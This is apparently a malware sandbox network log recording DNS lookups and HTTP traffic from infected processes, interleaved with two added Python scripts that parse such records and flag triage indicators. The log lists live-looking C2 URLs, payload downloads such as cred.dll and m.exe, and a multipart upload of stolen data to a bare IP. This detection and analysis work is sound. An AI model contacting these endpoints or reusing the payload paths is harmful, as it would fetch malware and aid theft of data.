                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.com/1Fb797
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1Fb797 HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 5.0/3
                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:13 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=i1s8a3r6f9pbt2s5r6kpfoigg5; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.210.80.127; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838017; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers:
                                                                                                                                                                                        whoami: 532db424391f6456d723160c1e096655ae07f0b562c5c2b1f0a05486354840ad
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.com/1Fn797
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1Fn797 HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 5.0/3
                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                        Cookie: PHPSESSID=i1s8a3r6f9pbt2s5r6kpfoigg5; clhf03028ja=51.210.80.127
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:17 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.210.80.127; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838014; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 2
                                                                                                                                                                                        whoami: 532db424391f6456d723160c1e096655ae07f0b562c5c2b1f0a05486354840ad
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        clients.l.google.com
                                                                                                                                                                                        clients.l.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.20.78
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.208.109
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.195.177
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.92.163
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        8.8.4.4
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        8.8.8.8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        o.lencr.edgesuite.net
                                                                                                                                                                                        o.lencr.edgesuite.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.96.171
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.96.192
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 325
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:12 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
• POST http://185.215.113.55/t5BnOoke2/index.php
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  POST /t5BnOoke2/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.55
  Content-Length: 84
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:16:12 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 6
  Content-Type: text/html; charset=UTF-8
• GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
  Host: 185.215.113.55
• POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
  Content-Type: multipart/form-data; boundary=----c59ae46c679c8e8e8dfdc07336b93d55
  Host: 185.215.113.55
  Content-Length: 79231
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:16:12 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Length: 0
  Content-Type: text/html; charset=UTF-8
• GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
  Host: 185.215.113.55
• POST http://iw.gamegame.info/report7.4.php
  Process: SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: iw.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
  Response
  HTTP/1.1 403 Forbidden
  Date: Fri, 02 Jul 2021 07:16:12 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  CF-Chl-Bypass: 1
  Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  X-Frame-Options: SAMEORIGIN
  cf-request-id: 0b07ac4e310000bf558bbd9000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zo7j9AbLdSuTR0JFNfQyF3Zmx%2BGUPpgVYXNT%2ByshWq5skEpjXWJi8rn0jRrZ4PKXOspwKVB0vJKBXIWfGlCTK3LGSGHiNehiJFPYVubJrOZIhZ8E8%2FiD9ZlJXL5gEw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 6686165d1c60bf55-AMS
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• GET https://cdn.discordapp.com/attachments/855697945679888404/859836642079932456/file1.bmp
  Process: arnatic_6.exe
  Remote address: 162.159.135.233:443
  Request
  GET /attachments/855697945679888404/859836642079932456/file1.bmp HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: cdn.discordapp.com
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:16:17 GMT
  Content-Type: image/x-ms-bmp
  Content-Length: 644608
  Connection: keep-alive
  CF-Ray: 66861677ad9dfa2c-AMS
  Accept-Ranges: bytes
  Age: 138683
  Cache-Control: public, max-age=31536000
  Content-Disposition: attachment;%20filename=file1.bmp
  ETag: "eab594642659c90ead038e6efbfe76c5"
  Expires: Sat, 02 Jul 2022 07:16:17 GMT
  Last-Modified: Wed, 30 Jun 2021 16:43:50 GMT
  Vary: Accept-Encoding
  CF-Cache-Status: HIT
  Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  x-goog-generation: 1625071430522842
  x-goog-hash: crc32c=//g7bw==
  x-goog-hash: md5=6rWUZCZZyQ6tA45u+/52xQ==
  x-goog-metageneration: 1
  x-goog-storage-class: STANDARD
  x-goog-stored-content-encoding: identity
  x-goog-stored-content-length: 644608
  X-GUploader-UploadID: ADPycdsyfOKG9q4flWRacLRVbWPBvpndh5EuJFXsNPF1iGjCTcrXW7TcYDolSMBE5hk08qwpnj1ZvExFSyuZRv6baSIiuzA5Ug
  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6gcH7%2BRtOfFdkfU8J5bIjypjJAoCKi5ci%2FVeEO%2BcaCQrOkrjdneQoEppPzrp8AWEmvlLsdMqOhpKOO%2BjA4UYJVz5cR7ySFinZgGHQjJ4y1%2F3V%2BkE6IL%2F631bNkc9ZYU%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
• DNS a.nel.cloudflare.com
  Process: chrome.exe
  Remote address: 8.8.8.8:53
  Request
  a.nel.cloudflare.com IN A
  Response
  a.nel.cloudflare.com IN A 35.190.80.1
• DNS clients2.googleusercontent.com
  Process: chrome.exe
  Remote address: 8.8.8.8:53
  Request
  clients2.googleusercontent.com IN A
  Response
  clients2.googleusercontent.com IN CNAME googlehosted.l.googleusercontent.com
  googlehosted.l.googleusercontent.com IN A 142.250.179.161
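The records above are raw sandbox output. To act on them (block lists, Suricata or Sigma rules, a ticket) an analyst normally parses the bullet-per-record layout and runs a few checks over it: a module pulled over plain HTTP from a bare IP, a multipart upload to the same bare IP right after it, a beacon that is answered by Cloudflare rather than by the origin, and a payload fetched from a public file-hosting CDN by something that is not a browser. The following is an added example and not part of the tria.ge report or of any of the malware families it names. The `SAMPLE` text is a constructed transcript that mirrors the entries on this page (process, remote address, request and response headers), trimmed to the headers the checks use; the rules, the `BROWSERS` and `FILE_HOSTS` lists and the finding strings are my assumptions, and the example does not attribute any record to a particular family.

```python
"""Parse tria.ge-style network records and run simple triage checks.
Added example; SAMPLE is constructed from the entries on this page."""
import ipaddress
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SAMPLE = """\
• GET http://185.215.113.55/t5BnOoke2/plugins/cred.dll
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
  Host: 185.215.113.55
• POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
  Process: nrbux.exe
  Remote address: 185.215.113.55:80
  Request
  POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
  Content-Type: multipart/form-data; boundary=----c59ae46c679c8e8e8dfdc07336b93d55
  Host: 185.215.113.55
  Content-Length: 79231
• POST http://iw.gamegame.info/report7.4.php
  Process: SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
  POST /report7.4.php HTTP/1.1
  Host: iw.gamegame.info
  Response
  HTTP/1.1 403 Forbidden
  CF-Chl-Bypass: 1
  Server: cloudflare
• GET https://cdn.discordapp.com/attachments/855697945679888404/859836642079932456/file1.bmp
  Process: arnatic_6.exe
  Remote address: 162.159.135.233:443
  Request
  GET /attachments/855697945679888404/859836642079932456/file1.bmp HTTP/1.1
  Host: cdn.discordapp.com
"""


@dataclass
class Record:
    method: str            # HTTP verb, or "DNS" for lookups
    url: str
    process: str = ""
    remote: str = ""
    status: int = 0        # response status, 0 when no response was recorded
    request: dict = field(default_factory=dict)   # lower-cased header -> value
    response: dict = field(default_factory=dict)  # lower-cased header -> value


def parse_records(text):
    """Split the bullet-per-record layout into Record objects."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• "):
            method, _, url = line[2:].partition(" ")
            records.append(Record(method, url))
            section = None
        elif not records:
            continue  # stray text before the first bullet
        elif line.startswith("Process: "):
            records[-1].process = line[9:]
        elif line.startswith("Remote address: "):
            records[-1].remote = line[16:]
        elif line in ("Request", "Response"):
            section = line
        elif section == "Response" and line.startswith("HTTP/"):
            records[-1].status = int(line.split()[1])
        elif section and ": " in line:  # header line inside Request/Response
            name, _, value = line.partition(": ")
            getattr(records[-1], section.lower())[name.lower()] = value
    return records


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumption
FILE_HOSTS = {"cdn.discordapp.com"}  # assumption: extend with CDNs seen in your telemetry


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage(rec):
    """Return findings for one record; an empty list means nothing stood out."""
    url, host = urlsplit(rec.url), rec.request.get("host", "")
    ctype = rec.request.get("content-type", "")
    findings = []
    if (rec.method == "GET" and url.scheme == "http" and is_bare_ip(host)
            and url.path.lower().endswith((".dll", ".exe"))):
        findings.append("plain-HTTP module download from bare IP")
    if rec.method == "POST" and is_bare_ip(host) and ctype.startswith("multipart/form-data"):
        size = rec.request.get("content-length", "?")
        findings.append("multipart upload to bare IP (%s bytes)" % size)
    if rec.status == 403 and "cf-chl-bypass" in rec.response:
        findings.append("beacon answered with a Cloudflare challenge; C2 may still be live")
    if rec.method == "GET" and host in FILE_HOSTS and rec.process not in BROWSERS:
        findings.append("file-hosting CDN fetch by non-browser process")
    return findings


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        for finding in triage(rec):
            print("%s  %s %s  %s" % (rec.process, rec.method, rec.url, finding))
```

Two of the checks deserve a caveat. The 403 on `iw.gamegame.info` carries `Server: cloudflare` and `CF-Chl-Bypass: 1`, so it was answered by Cloudflare's challenge layer and not by the origin; it says nothing about whether `/report7.4.php` exists, and the domain stays an indicator. The Discord CDN fetch is flagged on the process, not on the URL: the response really is served as `image/x-ms-bmp`, so a content-type rule would miss it, while a 644 KB "bitmap" requested by a freshly dropped executable is worth a look regardless of what it turns out to be.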

POST  http://lahuertasonora.com/upload/
Remote address: 220.125.1.129:80
Request
  POST /upload/ HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://lahuertasonora.com/upload/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 309
  Host: lahuertasonora.com
Response
  HTTP/1.0 404 Not Found
  Date: Fri, 02 Jul 2021 07:16:18 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Content-Length: 334
  Connection: close
  Content-Type: text/html; charset=utf-8

DNS  ssl.gstatic.com  (chrome.exe)
Remote address: 8.8.8.8:53
Request
  ssl.gstatic.com IN A
Response
  ssl.gstatic.com IN A 142.251.36.3

DNS  g-partners.top  (chrome.exe)
Remote address: 8.8.8.8:53
Request
  g-partners.top IN A
Response
  g-partners.top IN A 159.65.63.164

GET  http://g-partners.top/decision.php?pub=mixinte  (2aNJWnHICffmGqno89GuHbVV.exe)
Remote address: 159.65.63.164:80
Request
  GET /decision.php?pub=mixinte HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Uvok-6Yh5-3moO-pCUX
  Host: g-partners.top
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:16:19 GMT
  Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
  X-Powered-By: PHP/5.4.16
  Connection: close
  Transfer-Encoding: chunked
  Content-Type: text/html

DNS  hcaptcha.com  (chrome.exe)
Remote address: 8.8.8.8:53
Request
  hcaptcha.com IN A
Response
  hcaptcha.com IN A 104.16.168.131
  hcaptcha.com IN A 104.16.169.131

DNS  usa01.info  (chrome.exe)
Remote address: 8.8.8.8:53
Request
  usa01.info IN A
Response
  usa01.info IN A 176.99.131.168

GET  http://usa01.info/users/content/id03084901/mmow.txt  (f63HbxfV2WYcYU58wgLyTehf.exe)
Remote address: 176.99.131.168:80
Request
  GET /users/content/id03084901/mmow.txt HTTP/1.1
  User-Agent: Installed OK 1.0/3
  Host: usa01.info
Response
  HTTP/1.1 301 Moved Permanently
  Server: nginx/1.14.2
  Date: Fri, 02 Jul 2021 07:16:20 GMT
  Content-Type: text/html; charset=iso-8859-1
  Content-Length: 260
  Location: http://usa01.info/function/v2tmp/momomoomomom.php
  Connection: keep-alive

GET  http://usa01.info/function/v2tmp/momomoomomom.php  (f63HbxfV2WYcYU58wgLyTehf.exe)
Remote address: 176.99.131.168:80
Request
  GET /function/v2tmp/momomoomomom.php HTTP/1.1
  User-Agent: Installed OK 1.0/3
  Host: usa01.info
  Connection: Keep-Alive
Response
  HTTP/1.1 200 OK
  Server: nginx/1.14.2
  Date: Fri, 02 Jul 2021 07:16:20 GMT
  Content-Type: application/octet-stream
  Content-Length: 368640
  Connection: keep-alive
  Content-Disposition: attachment; filename=m.exe

GET  http://usa01.info/books/userpaths/birbik/harrypotter3.txt  (f63HbxfV2WYcYU58wgLyTehf.exe)
Remote address: 176.99.131.168:80
Request
  GET /books/userpaths/birbik/harrypotter3.txt HTTP/1.1
  User-Agent: Mozilla/5.0 (compatible; adscanner/)
  Host: usa01.info
Response
  HTTP/1.1 301 Moved Permanently
  Server: nginx/1.14.2
  Date: Fri, 02 Jul 2021 07:16:41 GMT
  Content-Type: text/html; charset=iso-8859-1
  Content-Length: 256
  Location: http://usa01.info/app/files/ap/id27315003.php
  Connection: keep-alive
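The HTTP records above carry several signals worth turning into detection logic: the POST to http://lahuertasonora.com/upload/ hits one of the C2 URLs from the SmokeLoader config extracted in this report and sets its Referer to its own URL; f63HbxfV2WYcYU58wgLyTehf.exe requests a .txt path with the User-Agent "Installed OK 1.0/3", is 301-redirected to a .php script, and receives an application/octet-stream body labelled filename=m.exe; and 2aNJWnHICffmGqno89GuHbVV.exe uses the User-Agent "Uvok-6Yh5-3moO-pCUX". The script below is an added example, not code from Triage or from this report. It parses a simplified transcription of those records (constructed from the entries above, with "-" standing in for a record that lists no process) and applies heuristic rules that are assumptions chosen for illustration: request to a known C2 URL, User-Agent without any browser or engine version token, self-referencing Referer on a POST, a .txt URL redirecting to a .php script, and an .exe served under a non-.exe path. One caveat on the 404 in the first record: SmokeLoader C2 servers are commonly reported to answer beacons with a 404 whose body carries the encrypted reply, so a 404 there is not evidence that the beacon failed.

```python
"""Heuristic triage of HTTP records from a sandbox network log.

Added example, not part of the Triage report. The record layout is a
simplified transcription of entries shown above; every rule below is an
assumption chosen for illustration, not a rule from the Triage product.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse

# C2 URLs as listed in the SmokeLoader config extracted in this report.
KNOWN_C2 = {
    "http://ppcspb.com/upload/", "http://mebbing.com/upload/",
    "http://twcamel.com/upload/", "http://howdycash.com/upload/",
    "http://lahuertasonora.com/upload/", "http://kpotiques.com/upload/",
}

# Assumption: a genuine browser UA carries an engine or browser version
# token; the hand-rolled UAs in this report do not.
BROWSER_TOKENS = re.compile(r"(Chrome|Firefox|Safari|Trident|Edge|Edg|Gecko)/\d")

@dataclass
class HttpRecord:
    method: str
    url: str
    process: Optional[str]
    remote: str
    req_headers: Dict[str, str] = field(default_factory=dict)
    status: Optional[int] = None
    resp_headers: Dict[str, str] = field(default_factory=dict)

def _headers(lines: List[str]) -> Dict[str, str]:
    out = {}
    for ln in lines:
        name, sep, value = ln.partition(":")   # 'Name: value' -> lower-cased name
        if sep:
            out[name.strip().lower()] = value.strip()
    return out

def parse_log(text: str) -> List[HttpRecord]:
    """One record per blank-line-separated chunk: a summary line
    '<METHOD> <url> <process|-> <ip:port>', a Request block, optional Response."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        method, url, process, remote = lines[0].split()
        rec = HttpRecord(method, url, None if process == "-" else process, remote)
        ri = lines.index("Request")
        rs = lines.index("Response") if "Response" in lines else len(lines)
        rec.req_headers = _headers(lines[ri + 2:rs])   # ri+1 is the request line
        if rs < len(lines):
            m = re.match(r"HTTP/\d\.\d (\d{3})", lines[rs + 1])
            rec.status = int(m.group(1)) if m else None
            rec.resp_headers = _headers(lines[rs + 2:])
        records.append(rec)
    return records

def findings(rec: HttpRecord) -> List[str]:
    out = []
    path = urlparse(rec.url).path
    ua = rec.req_headers.get("user-agent", "")
    if rec.url in KNOWN_C2:
        out.append("request to a C2 URL from the extracted SmokeLoader config")
    if ua and not BROWSER_TOKENS.search(ua):
        out.append(f"non-browser User-Agent {ua!r}")
    if rec.method == "POST" and rec.req_headers.get("referer") == rec.url:
        out.append("Referer identical to the POST URL (hand-built request)")
    loc = rec.resp_headers.get("location", "")
    if rec.status in (301, 302) and path.endswith(".txt") and urlparse(loc).path.endswith(".php"):
        out.append(f".txt URL redirects to server-side script {loc}")
    m = re.search(r'filename="?([^";]+)', rec.resp_headers.get("content-disposition", ""))
    if m and m.group(1).lower().endswith(".exe") and not path.lower().endswith(".exe"):
        out.append(f"executable {m.group(1)} served from {path}")
    return out

def analyze(text: str) -> Dict[str, List[str]]:
    """Map each record's URL to the list of rules it triggered."""
    return {r.url: findings(r) for r in parse_log(text)}

# Constructed sample: a trimmed transcription of four records from the report.
SAMPLE_LOG = """\
POST http://lahuertasonora.com/upload/ - 220.125.1.129:80
Request
POST /upload/ HTTP/1.1
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: lahuertasonora.com
Response
HTTP/1.0 404 Not Found
Content-Length: 334

GET http://g-partners.top/decision.php?pub=mixinte 2aNJWnHICffmGqno89GuHbVV.exe 159.65.63.164:80
Request
GET /decision.php?pub=mixinte HTTP/1.1
User-Agent: Uvok-6Yh5-3moO-pCUX
Host: g-partners.top
Response
HTTP/1.1 200 OK
Content-Type: text/html

GET http://usa01.info/users/content/id03084901/mmow.txt f63HbxfV2WYcYU58wgLyTehf.exe 176.99.131.168:80
Request
GET /users/content/id03084901/mmow.txt HTTP/1.1
User-Agent: Installed OK 1.0/3
Host: usa01.info
Response
HTTP/1.1 301 Moved Permanently
Location: http://usa01.info/function/v2tmp/momomoomomom.php

GET http://usa01.info/function/v2tmp/momomoomomom.php f63HbxfV2WYcYU58wgLyTehf.exe 176.99.131.168:80
Request
GET /function/v2tmp/momomoomomom.php HTTP/1.1
User-Agent: Installed OK 1.0/3
Host: usa01.info
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=m.exe
"""

if __name__ == "__main__":
    for url, hits in analyze(SAMPLE_LOG).items():
        print(url)
        for h in hits:
            print("  -", h)
```

Run as a script it prints each URL with the rules it tripped; the SmokeLoader beacon passes the User-Agent check (its IE11-style string carries a Trident token) and is caught only by the C2 list and the self-referencing Referer, which is the point of keeping several weak rules rather than one. The same rules apply unchanged to the harrypotter3.txt record above, which follows the same .txt-to-.php pattern under a different fake User-Agent.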

GET  http://usa01.info/app/files/ap/id27315003.php  (f63HbxfV2WYcYU58wgLyTehf.exe)
Remote address: 176.99.131.168:80
Request
  GET /app/files/ap/id27315003.php HTTP/1.1
  User-Agent: Mozilla/5.0 (compatible; adscanner/)
  Host: usa01.info
  Connection: Keep-Alive
Response
  HTTP/1.1 200 OK
  Server: nginx/1.14.2
  Date: Fri, 02 Jul 2021 07:16:42 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 366592
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Disposition: attachment; filename=compan.exe
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 145
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
